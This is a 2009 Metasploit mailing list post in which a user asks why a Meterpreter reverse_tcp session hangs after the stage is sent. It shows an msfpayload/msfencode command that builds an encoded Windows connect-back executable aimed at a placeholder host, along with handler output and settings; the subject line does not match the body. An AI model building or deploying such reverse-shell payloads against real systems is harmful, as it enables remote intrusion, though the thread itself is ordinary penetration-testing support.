Metasploit mailing list archives

error from auxiliary/scanner/oracle/sid_enum


From: jcran at 0x0e.org (Jonathan Cran)
Date: Wed, 2 Sep 2009 16:27:23 -0400

Running into issues with meterpreter connect-back binaries...

the meterpreter binary gets generated with:

./msfpayload windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443
R| ./msfencode -t exe -o encrypted.exe;

Then it is run on the client.

On the server, you see the connection made:

msf exploit(handler) > exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Sending stage (718336 bytes)





... and it hangs. Haven't dug in too deeply, wondering if i'm doing
something silly. Ideas?



More Detail:
-----------------
msf exploit(handler) > set

Global
======

No entries in data store.

Module: multi/handler
=====================

  Name                   Value
  ----                   -----
  AutoLoadStdapi         true
  AutoRunScript
  EXITFUNC               thread
  EnableContextEncoding  false
  ExitOnSession          false
  LHOST                  X.X.X.X
  LPORT                  443
  PAYLOAD                windows/meterpreter/reverse_tcp
  TARGET                 0
  WfsDelay               0

Version info:
------------------
msf exploit(handler) > version
Framework: 3.3-dev.6055
Console  : 3.3-dev.6961
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090902/9327deac/attachment.html>


Current thread: